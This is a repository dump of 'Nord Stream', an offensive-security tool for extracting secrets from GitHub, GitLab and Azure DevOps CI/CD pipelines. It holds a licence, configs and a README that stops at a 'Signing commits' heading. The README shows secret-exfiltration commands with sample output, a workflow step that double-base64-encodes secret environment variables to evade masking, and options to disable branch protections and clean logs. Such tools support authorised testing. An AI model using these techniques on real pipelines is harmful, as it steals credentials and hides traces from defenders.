Repository: synacktiv/nord-stream
Branch: main
Commit: 7c96209da201
Files: 32
Total size: 282.7 KB
Directory structure:
gitextract_yz6qr87i/
├── .github/
│   └── ISSUE_TEMPLATE/
│       ├── bug_report.md
│       └── feature_request.md
├── .gitignore
├── .pre-commit-config.yaml
├── CONTRIBUTING.md
├── LICENSE
├── README.md
├── nordstream/
│   ├── __main__.py
│   ├── cicd/
│   │   ├── devops.py
│   │   ├── github.py
│   │   └── gitlab.py
│   ├── commands/
│   │   ├── devops.py
│   │   ├── github.py
│   │   └── gitlab.py
│   ├── core/
│   │   ├── devops/
│   │   │   └── devops.py
│   │   ├── github/
│   │   │   ├── display.py
│   │   │   ├── github.py
│   │   │   └── protections.py
│   │   └── gitlab/
│   │       └── gitlab.py
│   ├── git.py
│   ├── utils/
│   │   ├── constants.py
│   │   ├── devops.py
│   │   ├── errors.py
│   │   ├── helpers.py
│   │   └── log.py
│   └── yaml/
│       ├── custom.py
│       ├── devops.py
│       ├── generator.py
│       ├── github.py
│       └── gitlab.py
├── pyproject.toml
└── requirements.txt
================================================
FILE CONTENTS
================================================
================================================
FILE: .github/ISSUE_TEMPLATE/bug_report.md
================================================
---
name: Bug report
about: Create a report to help us improve
title: "[BUG]"
labels: bug
assignees: hugo-syn
---
**Describe the bug**
A clear and concise description of what the bug is.
**To Reproduce**
Add information that could help us to reproduce the bug like:
- privileges of the Token
- scope of the Token
- protections on a branch or environment
- Output of the tool with the `--debug` option (don't forget to strip your secrets)
**Screenshots**
If applicable, add screenshots to help explain your problem.
**Additional context**
Add any other context about the problem here.
================================================
FILE: .github/ISSUE_TEMPLATE/feature_request.md
================================================
---
name: Feature request
about: Suggest an idea for this project
title: "[FEAT]"
labels: enhancement
assignees: hugo-syn
---
**Is your feature request related to a problem? Please describe.**
A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
**Describe the solution you'd like**
A clear and concise description of what you want to happen.
**Additional context**
Add any other context or screenshots about the feature request here. This can include specific configuration of the SCM or CI/CD system to help us implement the feature.
================================================
FILE: .gitignore
================================================
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
*$py.class
build/
#custom
nord-stream-logs/
notes.md
.vscode
================================================
FILE: .pre-commit-config.yaml
================================================
repos:
  - repo: https://github.com/pre-commit/pre-commit-hooks
    rev: v6.0.0
    hooks:
      - id: check-added-large-files
      - id: check-case-conflict
      - id: check-executables-have-shebangs
      - id: check-merge-conflict
      - id: check-shebang-scripts-are-executable
      - id: end-of-file-fixer
      - id: fix-byte-order-marker
      - id: mixed-line-ending
        args:
          - --fix=no
      - id: trailing-whitespace
        args:
          - --markdown-linebreak-ext=md
  - repo: https://github.com/psf/black
    rev: 26.1.0
    hooks:
      - id: black
        language_version: python3
        args:
          - --line-length=120
  - repo: https://github.com/compilerla/conventional-pre-commit
    rev: v4.4.0
    hooks:
      - id: conventional-pre-commit
        stages: [commit-msg]
        args: [build, chore, ci, docs, feat, fix, perf, refactor, revert, style, test]
================================================
FILE: CONTRIBUTING.md
================================================
# Contributing rules
- Install [`pre-commit`](https://pre-commit.com/).
- Enable `pre-commit` hooks in the repository folder: `pre-commit install && pre-commit install --hook-type commit-msg`. These hooks automatically format the code and check the format of the commit message.
- The format of commit messages must follow the [Conventional Commits](https://www.conventionalcommits.org/en/v1.0.0/) convention.
================================================
FILE: LICENSE
================================================
GNU GENERAL PUBLIC LICENSE
Version 3, 29 June 2007
Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The GNU General Public License is a free, copyleft license for
software and other kinds of works.
The licenses for most software and other practical works are designed
to take away your freedom to share and change the works. By contrast,
the GNU General Public License is intended to guarantee your freedom to
share and change all versions of a program--to make sure it remains free
software for all its users. We, the Free Software Foundation, use the
GNU General Public License for most of our software; it applies also to
any other work released this way by its authors. You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
them if you wish), that you receive source code or can get it if you
want it, that you can change the software or use pieces of it in new
free programs, and that you know you can do these things.
To protect your rights, we need to prevent others from denying you
these rights or asking you to surrender the rights. Therefore, you have
certain responsibilities if you distribute copies of the software, or if
you modify it: responsibilities to respect the freedom of others.
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must pass on to the recipients the same
freedoms that you received. You must make sure that they, too, receive
or can get the source code. And you must show them these terms so they
know their rights.
Developers that use the GNU GPL protect your rights with two steps:
(1) assert copyright on the software, and (2) offer you this License
giving you legal permission to copy, distribute and/or modify it.
For the developers' and authors' protection, the GPL clearly explains
that there is no warranty for this free software. For both users' and
authors' sake, the GPL requires that modified versions be marked as
changed, so that their problems will not be attributed erroneously to
authors of previous versions.
Some devices are designed to deny users access to install or run
modified versions of the software inside them, although the manufacturer
can do so. This is fundamentally incompatible with the aim of
protecting users' freedom to change the software. The systematic
pattern of such abuse occurs in the area of products for individuals to
use, which is precisely where it is most unacceptable. Therefore, we
have designed this version of the GPL to prohibit the practice for those
products. If such problems arise substantially in other domains, we
stand ready to extend this provision to those domains in future versions
of the GPL, as needed to protect the freedom of users.
Finally, every program is threatened constantly by software patents.
States should not allow patents to restrict development and use of
software on general-purpose computers, but in those that do, we wish to
avoid the special danger that patents applied to a free program could
make it effectively proprietary. To prevent this, the GPL assures that
patents cannot be used to render the program non-free.
The precise terms and conditions for copying, distribution and
modification follow.
TERMS AND CONDITIONS
0. Definitions.
"This License" refers to version 3 of the GNU General Public License.
"Copyright" also means copyright-like laws that apply to other kinds of
works, such as semiconductor masks.
"The Program" refers to any copyrightable work licensed under this
License. Each licensee is addressed as "you". "Licensees" and
"recipients" may be individuals or organizations.
To "modify" a work means to copy from or adapt all or part of the work
in a fashion requiring copyright permission, other than the making of an
exact copy. The resulting work is called a "modified version" of the
earlier work or a work "based on" the earlier work.
A "covered work" means either the unmodified Program or a work based
on the Program.
To "propagate" a work means to do anything with it that, without
permission, would make you directly or secondarily liable for
infringement under applicable copyright law, except executing it on a
computer or modifying a private copy. Propagation includes copying,
distribution (with or without modification), making available to the
public, and in some countries other activities as well.
To "convey" a work means any kind of propagation that enables other
parties to make or receive copies. Mere interaction with a user through
a computer network, with no transfer of a copy, is not conveying.
An interactive user interface displays "Appropriate Legal Notices"
to the extent that it includes a convenient and prominently visible
feature that (1) displays an appropriate copyright notice, and (2)
tells the user that there is no warranty for the work (except to the
extent that warranties are provided), that licensees may convey the
work under this License, and how to view a copy of this License. If
the interface presents a list of user commands or options, such as a
menu, a prominent item in the list meets this criterion.
1. Source Code.
The "source code" for a work means the preferred form of the work
for making modifications to it. "Object code" means any non-source
form of a work.
A "Standard Interface" means an interface that either is an official
standard defined by a recognized standards body, or, in the case of
interfaces specified for a particular programming language, one that
is widely used among developers working in that language.
The "System Libraries" of an executable work include anything, other
than the work as a whole, that (a) is included in the normal form of
packaging a Major Component, but which is not part of that Major
Component, and (b) serves only to enable use of the work with that
Major Component, or to implement a Standard Interface for which an
implementation is available to the public in source code form. A
"Major Component", in this context, means a major essential component
(kernel, window system, and so on) of the specific operating system
(if any) on which the executable work runs, or a compiler used to
produce the work, or an object code interpreter used to run it.
The "Corresponding Source" for a work in object code form means all
the source code needed to generate, install, and (for an executable
work) run the object code and to modify the work, including scripts to
control those activities. However, it does not include the work's
System Libraries, or general-purpose tools or generally available free
programs which are used unmodified in performing those activities but
which are not part of the work. For example, Corresponding Source
includes interface definition files associated with source files for
the work, and the source code for shared libraries and dynamically
linked subprograms that the work is specifically designed to require,
such as by intimate data communication or control flow between those
subprograms and other parts of the work.
The Corresponding Source need not include anything that users
can regenerate automatically from other parts of the Corresponding
Source.
The Corresponding Source for a work in source code form is that
same work.
2. Basic Permissions.
All rights granted under this License are granted for the term of
copyright on the Program, and are irrevocable provided the stated
conditions are met. This License explicitly affirms your unlimited
permission to run the unmodified Program. The output from running a
covered work is covered by this License only if the output, given its
content, constitutes a covered work. This License acknowledges your
rights of fair use or other equivalent, as provided by copyright law.
You may make, run and propagate covered works that you do not
convey, without conditions so long as your license otherwise remains
in force. You may convey covered works to others for the sole purpose
of having them make modifications exclusively for you, or provide you
with facilities for running those works, provided that you comply with
the terms of this License in conveying all material for which you do
not control copyright. Those thus making or running the covered works
for you must do so exclusively on your behalf, under your direction
and control, on terms that prohibit them from making any copies of
your copyrighted material outside their relationship with you.
Conveying under any other circumstances is permitted solely under
the conditions stated below. Sublicensing is not allowed; section 10
makes it unnecessary.
3. Protecting Users' Legal Rights From Anti-Circumvention Law.
No covered work shall be deemed part of an effective technological
measure under any applicable law fulfilling obligations under article
11 of the WIPO copyright treaty adopted on 20 December 1996, or
similar laws prohibiting or restricting circumvention of such
measures.
When you convey a covered work, you waive any legal power to forbid
circumvention of technological measures to the extent such circumvention
is effected by exercising rights under this License with respect to
the covered work, and you disclaim any intention to limit operation or
modification of the work as a means of enforcing, against the work's
users, your or third parties' legal rights to forbid circumvention of
technological measures.
4. Conveying Verbatim Copies.
You may convey verbatim copies of the Program's source code as you
receive it, in any medium, provided that you conspicuously and
appropriately publish on each copy an appropriate copyright notice;
keep intact all notices stating that this License and any
non-permissive terms added in accord with section 7 apply to the code;
keep intact all notices of the absence of any warranty; and give all
recipients a copy of this License along with the Program.
You may charge any price or no price for each copy that you convey,
and you may offer support or warranty protection for a fee.
5. Conveying Modified Source Versions.
You may convey a work based on the Program, or the modifications to
produce it from the Program, in the form of source code under the
terms of section 4, provided that you also meet all of these conditions:
a) The work must carry prominent notices stating that you modified
it, and giving a relevant date.
b) The work must carry prominent notices stating that it is
released under this License and any conditions added under section
7. This requirement modifies the requirement in section 4 to
"keep intact all notices".
c) You must license the entire work, as a whole, under this
License to anyone who comes into possession of a copy. This
License will therefore apply, along with any applicable section 7
additional terms, to the whole of the work, and all its parts,
regardless of how they are packaged. This License gives no
permission to license the work in any other way, but it does not
invalidate such permission if you have separately received it.
d) If the work has interactive user interfaces, each must display
Appropriate Legal Notices; however, if the Program has interactive
interfaces that do not display Appropriate Legal Notices, your
work need not make them do so.
A compilation of a covered work with other separate and independent
works, which are not by their nature extensions of the covered work,
and which are not combined with it such as to form a larger program,
in or on a volume of a storage or distribution medium, is called an
"aggregate" if the compilation and its resulting copyright are not
used to limit the access or legal rights of the compilation's users
beyond what the individual works permit. Inclusion of a covered work
in an aggregate does not cause this License to apply to the other
parts of the aggregate.
6. Conveying Non-Source Forms.
You may convey a covered work in object code form under the terms
of sections 4 and 5, provided that you also convey the
machine-readable Corresponding Source under the terms of this License,
in one of these ways:
a) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by the
Corresponding Source fixed on a durable physical medium
customarily used for software interchange.
b) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by a
written offer, valid for at least three years and valid for as
long as you offer spare parts or customer support for that product
model, to give anyone who possesses the object code either (1) a
copy of the Corresponding Source for all the software in the
product that is covered by this License, on a durable physical
medium customarily used for software interchange, for a price no
more than your reasonable cost of physically performing this
conveying of source, or (2) access to copy the
Corresponding Source from a network server at no charge.
c) Convey individual copies of the object code with a copy of the
written offer to provide the Corresponding Source. This
alternative is allowed only occasionally and noncommercially, and
only if you received the object code with such an offer, in accord
with subsection 6b.
d) Convey the object code by offering access from a designated
place (gratis or for a charge), and offer equivalent access to the
Corresponding Source in the same way through the same place at no
further charge. You need not require recipients to copy the
Corresponding Source along with the object code. If the place to
copy the object code is a network server, the Corresponding Source
may be on a different server (operated by you or a third party)
that supports equivalent copying facilities, provided you maintain
clear directions next to the object code saying where to find the
Corresponding Source. Regardless of what server hosts the
Corresponding Source, you remain obligated to ensure that it is
available for as long as needed to satisfy these requirements.
e) Convey the object code using peer-to-peer transmission, provided
you inform other peers where the object code and Corresponding
Source of the work are being offered to the general public at no
charge under subsection 6d.
A separable portion of the object code, whose source code is excluded
from the Corresponding Source as a System Library, need not be
included in conveying the object code work.
A "User Product" is either (1) a "consumer product", which means any
tangible personal property which is normally used for personal, family,
or household purposes, or (2) anything designed or sold for incorporation
into a dwelling. In determining whether a product is a consumer product,
doubtful cases shall be resolved in favor of coverage. For a particular
product received by a particular user, "normally used" refers to a
typical or common use of that class of product, regardless of the status
of the particular user or of the way in which the particular user
actually uses, or expects or is expected to use, the product. A product
is a consumer product regardless of whether the product has substantial
commercial, industrial or non-consumer uses, unless such uses represent
the only significant mode of use of the product.
"Installation Information" for a User Product means any methods,
procedures, authorization keys, or other information required to install
and execute modified versions of a covered work in that User Product from
a modified version of its Corresponding Source. The information must
suffice to ensure that the continued functioning of the modified object
code is in no case prevented or interfered with solely because
modification has been made.
If you convey an object code work under this section in, or with, or
specifically for use in, a User Product, and the conveying occurs as
part of a transaction in which the right of possession and use of the
User Product is transferred to the recipient in perpetuity or for a
fixed term (regardless of how the transaction is characterized), the
Corresponding Source conveyed under this section must be accompanied
by the Installation Information. But this requirement does not apply
if neither you nor any third party retains the ability to install
modified object code on the User Product (for example, the work has
been installed in ROM).
The requirement to provide Installation Information does not include a
requirement to continue to provide support service, warranty, or updates
for a work that has been modified or installed by the recipient, or for
the User Product in which it has been modified or installed. Access to a
network may be denied when the modification itself materially and
adversely affects the operation of the network or violates the rules and
protocols for communication across the network.
Corresponding Source conveyed, and Installation Information provided,
in accord with this section must be in a format that is publicly
documented (and with an implementation available to the public in
source code form), and must require no special password or key for
unpacking, reading or copying.
7. Additional Terms.
"Additional permissions" are terms that supplement the terms of this
License by making exceptions from one or more of its conditions.
Additional permissions that are applicable to the entire Program shall
be treated as though they were included in this License, to the extent
that they are valid under applicable law. If additional permissions
apply only to part of the Program, that part may be used separately
under those permissions, but the entire Program remains governed by
this License without regard to the additional permissions.
When you convey a copy of a covered work, you may at your option
remove any additional permissions from that copy, or from any part of
it. (Additional permissions may be written to require their own
removal in certain cases when you modify the work.) You may place
additional permissions on material, added by you to a covered work,
for which you have or can give appropriate copyright permission.
Notwithstanding any other provision of this License, for material you
add to a covered work, you may (if authorized by the copyright holders of
that material) supplement the terms of this License with terms:
a) Disclaiming warranty or limiting liability differently from the
terms of sections 15 and 16 of this License; or
b) Requiring preservation of specified reasonable legal notices or
author attributions in that material or in the Appropriate Legal
Notices displayed by works containing it; or
c) Prohibiting misrepresentation of the origin of that material, or
requiring that modified versions of such material be marked in
reasonable ways as different from the original version; or
d) Limiting the use for publicity purposes of names of licensors or
authors of the material; or
e) Declining to grant rights under trademark law for use of some
trade names, trademarks, or service marks; or
f) Requiring indemnification of licensors and authors of that
material by anyone who conveys the material (or modified versions of
it) with contractual assumptions of liability to the recipient, for
any liability that these contractual assumptions directly impose on
those licensors and authors.
All other non-permissive additional terms are considered "further
restrictions" within the meaning of section 10. If the Program as you
received it, or any part of it, contains a notice stating that it is
governed by this License along with a term that is a further
restriction, you may remove that term. If a license document contains
a further restriction but permits relicensing or conveying under this
License, you may add to a covered work material governed by the terms
of that license document, provided that the further restriction does
not survive such relicensing or conveying.
If you add terms to a covered work in accord with this section, you
must place, in the relevant source files, a statement of the
additional terms that apply to those files, or a notice indicating
where to find the applicable terms.
Additional terms, permissive or non-permissive, may be stated in the
form of a separately written license, or stated as exceptions;
the above requirements apply either way.
8. Termination.
You may not propagate or modify a covered work except as expressly
provided under this License. Any attempt otherwise to propagate or
modify it is void, and will automatically terminate your rights under
this License (including any patent licenses granted under the third
paragraph of section 11).
However, if you cease all violation of this License, then your
license from a particular copyright holder is reinstated (a)
provisionally, unless and until the copyright holder explicitly and
finally terminates your license, and (b) permanently, if the copyright
holder fails to notify you of the violation by some reasonable means
prior to 60 days after the cessation.
Moreover, your license from a particular copyright holder is
reinstated permanently if the copyright holder notifies you of the
violation by some reasonable means, this is the first time you have
received notice of violation of this License (for any work) from that
copyright holder, and you cure the violation prior to 30 days after
your receipt of the notice.
Termination of your rights under this section does not terminate the
licenses of parties who have received copies or rights from you under
this License. If your rights have been terminated and not permanently
reinstated, you do not qualify to receive new licenses for the same
material under section 10.
9. Acceptance Not Required for Having Copies.
You are not required to accept this License in order to receive or
run a copy of the Program. Ancillary propagation of a covered work
occurring solely as a consequence of using peer-to-peer transmission
to receive a copy likewise does not require acceptance. However,
nothing other than this License grants you permission to propagate or
modify any covered work. These actions infringe copyright if you do
not accept this License. Therefore, by modifying or propagating a
covered work, you indicate your acceptance of this License to do so.
10. Automatic Licensing of Downstream Recipients.
Each time you convey a covered work, the recipient automatically
receives a license from the original licensors, to run, modify and
propagate that work, subject to this License. You are not responsible
for enforcing compliance by third parties with this License.
An "entity transaction" is a transaction transferring control of an
organization, or substantially all assets of one, or subdividing an
organization, or merging organizations. If propagation of a covered
work results from an entity transaction, each party to that
transaction who receives a copy of the work also receives whatever
licenses to the work the party's predecessor in interest had or could
give under the previous paragraph, plus a right to possession of the
Corresponding Source of the work from the predecessor in interest, if
the predecessor has it or can get it with reasonable efforts.
You may not impose any further restrictions on the exercise of the
rights granted or affirmed under this License. For example, you may
not impose a license fee, royalty, or other charge for exercise of
rights granted under this License, and you may not initiate litigation
(including a cross-claim or counterclaim in a lawsuit) alleging that
any patent claim is infringed by making, using, selling, offering for
sale, or importing the Program or any portion of it.
11. Patents.
A "contributor" is a copyright holder who authorizes use under this
License of the Program or a work on which the Program is based. The
work thus licensed is called the contributor's "contributor version".
A contributor's "essential patent claims" are all patent claims
owned or controlled by the contributor, whether already acquired or
hereafter acquired, that would be infringed by some manner, permitted
by this License, of making, using, or selling its contributor version,
but do not include claims that would be infringed only as a
consequence of further modification of the contributor version. For
purposes of this definition, "control" includes the right to grant
patent sublicenses in a manner consistent with the requirements of
this License.
Each contributor grants you a non-exclusive, worldwide, royalty-free
patent license under the contributor's essential patent claims, to
make, use, sell, offer for sale, import and otherwise run, modify and
propagate the contents of its contributor version.
In the following three paragraphs, a "patent license" is any express
agreement or commitment, however denominated, not to enforce a patent
(such as an express permission to practice a patent or covenant not to
sue for patent infringement). To "grant" such a patent license to a
party means to make such an agreement or commitment not to enforce a
patent against the party.
If you convey a covered work, knowingly relying on a patent license,
and the Corresponding Source of the work is not available for anyone
to copy, free of charge and under the terms of this License, through a
publicly available network server or other readily accessible means,
then you must either (1) cause the Corresponding Source to be so
available, or (2) arrange to deprive yourself of the benefit of the
patent license for this particular work, or (3) arrange, in a manner
consistent with the requirements of this License, to extend the patent
license to downstream recipients. "Knowingly relying" means you have
actual knowledge that, but for the patent license, your conveying the
covered work in a country, or your recipient's use of the covered work
in a country, would infringe one or more identifiable patents in that
country that you have reason to believe are valid.
If, pursuant to or in connection with a single transaction or
arrangement, you convey, or propagate by procuring conveyance of, a
covered work, and grant a patent license to some of the parties
receiving the covered work authorizing them to use, propagate, modify
or convey a specific copy of the covered work, then the patent license
you grant is automatically extended to all recipients of the covered
work and works based on it.
A patent license is "discriminatory" if it does not include within
the scope of its coverage, prohibits the exercise of, or is
conditioned on the non-exercise of one or more of the rights that are
specifically granted under this License. You may not convey a covered
work if you are a party to an arrangement with a third party that is
in the business of distributing software, under which you make payment
to the third party based on the extent of your activity of conveying
the work, and under which the third party grants, to any of the
parties who would receive the covered work from you, a discriminatory
patent license (a) in connection with copies of the covered work
conveyed by you (or copies made from those copies), or (b) primarily
for and in connection with specific products or compilations that
contain the covered work, unless you entered into that arrangement,
or that patent license was granted, prior to 28 March 2007.
Nothing in this License shall be construed as excluding or limiting
any implied license or other defenses to infringement that may
otherwise be available to you under applicable patent law.
12. No Surrender of Others' Freedom.
If conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot convey a
covered work so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you may
not convey it at all. For example, if you agree to terms that obligate you
to collect a royalty for further conveying from those to whom you convey
the Program, the only way you could satisfy both those terms and this
License would be to refrain entirely from conveying the Program.
13. Use with the GNU Affero General Public License.
Notwithstanding any other provision of this License, you have
permission to link or combine any covered work with a work licensed
under version 3 of the GNU Affero General Public License into a single
combined work, and to convey the resulting work. The terms of this
License will continue to apply to the part which is the covered work,
but the special requirements of the GNU Affero General Public License,
section 13, concerning interaction through a network will apply to the
combination as such.
14. Revised Versions of this License.
The Free Software Foundation may publish revised and/or new versions of
the GNU General Public License from time to time. Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the
Program specifies that a certain numbered version of the GNU General
Public License "or any later version" applies to it, you have the
option of following the terms and conditions either of that numbered
version or of any later version published by the Free Software
Foundation. If the Program does not specify a version number of the
GNU General Public License, you may choose any version ever published
by the Free Software Foundation.
If the Program specifies that a proxy can decide which future
versions of the GNU General Public License can be used, that proxy's
public statement of acceptance of a version permanently authorizes you
to choose that version for the Program.
Later license versions may give you additional or different
permissions. However, no additional obligations are imposed on any
author or copyright holder as a result of your choosing to follow a
later version.
15. Disclaimer of Warranty.
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
16. Limitation of Liability.
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
SUCH DAMAGES.
17. Interpretation of Sections 15 and 16.
If the disclaimer of warranty and limitation of liability provided
above cannot be given local legal effect according to their terms,
reviewing courts shall apply local law that most closely approximates
an absolute waiver of all civil liability in connection with the
Program, unless a warranty or assumption of liability accompanies a
copy of the Program in return for a fee.
END OF TERMS AND CONDITIONS
How to Apply These Terms to Your New Programs
If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.
To do so, attach the following notices to the program. It is safest
to attach them to the start of each source file to most effectively
state the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.
<one line to give the program's name and a brief idea of what it does.>
Copyright (C) <year> <name of author>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>.
Also add information on how to contact you by electronic and paper mail.
If the program does terminal interaction, make it output a short
notice like this when it starts in an interactive mode:
<program> Copyright (C) <year> <name of author>
This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
This is free software, and you are welcome to redistribute it
under certain conditions; type `show c' for details.
The hypothetical commands `show w' and `show c' should show the appropriate
parts of the General Public License. Of course, your program's commands
might be different; for a GUI interface, you would use an "about box".
You should also get your employer (if you work as a programmer) or school,
if any, to sign a "copyright disclaimer" for the program, if necessary.
For more information on this, and how to apply and follow the GNU GPL, see
<https://www.gnu.org/licenses/>.
The GNU General Public License does not permit incorporating your program
into proprietary programs. If your program is a subroutine library, you
may consider it more useful to permit linking proprietary applications with
the library. If this is what you want to do, use the GNU Lesser General
Public License instead of this License. But first, please read
<https://www.gnu.org/licenses/why-not-lgpl.html>.
================================================
FILE: README.md
================================================
# Nord Stream
Nord Stream is a tool that allows you to extract secrets stored inside CI/CD environments by deploying _malicious_ pipelines.
It currently supports Azure DevOps, GitHub and GitLab.
Find out more in the following blogpost: https://www.synacktiv.com/publications/cicd-secrets-extraction-tips-and-tricks
## Table of Contents
- [Nord Stream](#nord-stream)
- [Table of Contents](#table-of-contents)
- [Installation](#installation)
- [Usage](#usage)
- [Shared arguments](#shared-arguments)
- [Describe token](#describe-token)
- [Build YAML](#build-yaml)
- [YAML](#yaml)
- [Clean logs](#clean-logs)
- [Signing commits](#signing-commits)
- [Azure DevOps](#azure-devops)
- [Service connections](#service-connections)
- [SSH](#ssh)
- [Listing orgs](#listing-orgs)
- [Help](#help)
- [GitHub](#github)
- [List protections](#list-protections)
- [Disable protections](#disable-protections)
- [Force](#force)
- [Azure OIDC](#azure-oidc)
- [AWS OIDC](#aws-oidc)
- [Help](#help-1)
- [GitLab](#gitlab)
- [List secrets](#list-secrets)
- [YAML](#yaml-1)
- [List protections](#list-protections-1)
- [Help](#help-2)
- [TODO](#todo)
- [Contact](#contact)
## Installation
```
$ pipx install git+https://github.com/synacktiv/nord-stream
```
`git` is also required (see https://git-scm.com/download/) and must exist in your `PATH`.
## Usage
Here is a simple example on GitHub; initially, one can enumerate the various secrets.
```sh
$ nord-stream github --token "$GHP" --org org --list-secrets --repo repo
[*] Listing secrets:
[*] "org/repo" secrets
[*] Repo secrets:
- REPO_SECRET
- SUPER_SECRET
[*] PROD secrets:
- PROD_SECRET
```
Then proceed to the exfiltration:
```sh
$ nord-stream github --token "$GHP" --org org --repo repo
[+] "org/repo"
[*] No branch protection rule found on "dev_remote_ea5Eu/test/v1" branch
[*] Getting secrets from repo: "org/repo"
[*] Getting workflow output
[!] Workflow not finished, sleeping for 15s
[+] Workflow has successfully terminated.
[+] Secrets:
secret_SUPER_SECRET=value for super secret
secret_REPO_SECRET=repository secret
[*] Getting secrets from environment: "PROD" (org/repo)
[*] Getting workflow output
[!] Workflow not finished, sleeping for 15s
[+] Workflow has successfully terminated.
[+] Secrets:
secret_PROD_SECRET=Value only accessible from prod environment
[*] Cleaning logs.
[*] Check output: /home/hugov/Documents/pentest/RD/CICD/tools/nord-stream/nord-stream/nord-stream-logs/github
```
### Shared arguments
Some arguments are shared between [GitHub](#github), [Azure DevOps](#azure-devops) and [GitLab](#gitlab); here are some examples.
#### Describe token
The `--describe-token` option can be used to display general information about your token:
```bash
$ nord-stream github --token "$PAT" --describe-token
[*] Token information:
- Login: CICD
- IsAdmin: False
- Id: 1337
- Bio: None
```
#### Build YAML
The `--build-yaml` option can be used to create a pipeline file without deploying it. It retrieves the various secret names to build the associated pipeline, which can be used to add custom steps:
```bash
$ nord-stream github --token "$PAT" --org Synacktiv --repo repo --env PROD --build-yaml custom.yml
[+] YAML file:
name: GitHub Actions
'on': push
jobs:
  init:
    runs-on: ubuntu-latest
    steps:
      - run: env -0 | awk -v RS='\0' '/^secret_/ {print $0}' | base64 -w0 | base64 -w0
        name: command
        env:
          secret_PROD_SECRET: ${{secrets.PROD_SECRET}}
    environment: PROD
```
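The generated `command` step double-encodes the filtered environment with base64 before printing it, so the secrets can also be recovered from the raw workflow log if you deploy the generated file yourself with `--yaml`. A minimal decoding sketch, assuming the printed blob was saved to a hypothetical `blob.b64` file:

```bash
# Decode the doubly base64-encoded blob printed by the "command" step.
# Entries are NUL-separated because the step reads the environment with `env -0`.
base64 -d blob.b64 | base64 -d | tr '\0' '\n'
```

When Nord Stream deploys the pipeline itself, this decoding is done automatically and the secrets are printed in clear, as in the exfiltration example above.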
#### YAML
The `--yaml` option can be used to deploy a custom pipeline:
```yml
name: GitHub Actions
'on': push
jobs:
  init:
    runs-on: ubuntu-latest
    steps:
      - run: echo "Hello from step 1"
        name: step 1
      - run: echo "Doing some important stuff here"
        name: command
      - run: echo "Hello from last step "
        name: last step
```
```bash
$ nord-stream github --token "$PAT" --org Synacktiv --repo repo --yaml custom.yml
[+] "synacktiv/repo"
[*] No branch protection rule found on "dev_remote_ea5Eu/test/v1" branch
[*] Running custom workflow: .../custom.yml
[*] Getting workflow output
[!] Workflow not finished, sleeping for 15s
[+] Workflow has successfully terminated.
[+] Workflow output:
2023-07-18T20:08:33.0073670Z ##[group]Run echo "Doing some important stuff here"
2023-07-18T20:08:33.0074247Z echo "Doing some important stuff here"
2023-07-18T20:08:33.0136846Z shell: /usr/bin/bash -e {0}
2023-07-18T20:08:33.0137261Z ##[endgroup]
2023-07-18T20:08:33.0422019Z Doing some important stuff here
[*] Cleaning logs.
[*] Check output: .../nord-stream-logs/github
```
By default, it will display the output of the task named `command` of the `init` job, but everything is stored locally and can be accessed manually:
```bash
$ cat nord-stream-logs/github/synacktiv/repo/workflow_custom_2023-07-18_22-08-44/init/4_last\ step.txt
2023-07-18T20:08:33.0458509Z ##[group]Run echo "Hello from last step "
2023-07-18T20:08:33.0459084Z echo "Hello from last step "
2023-07-18T20:08:33.0511473Z shell: /usr/bin/bash -e {0}
2023-07-18T20:08:33.0511890Z ##[endgroup]
2023-07-18T20:08:33.0597853Z Hello from last step
```
#### Clean logs
By default, Nord Stream will attempt to remove the traces left by a pipeline deployment, depending on your privileges. To keep the pipeline logs, the `--no-clean` option can be used; the changes made to the repository will still be reverted.
Note that for GitLab, some traces cannot be deleted.
#### Signing commits
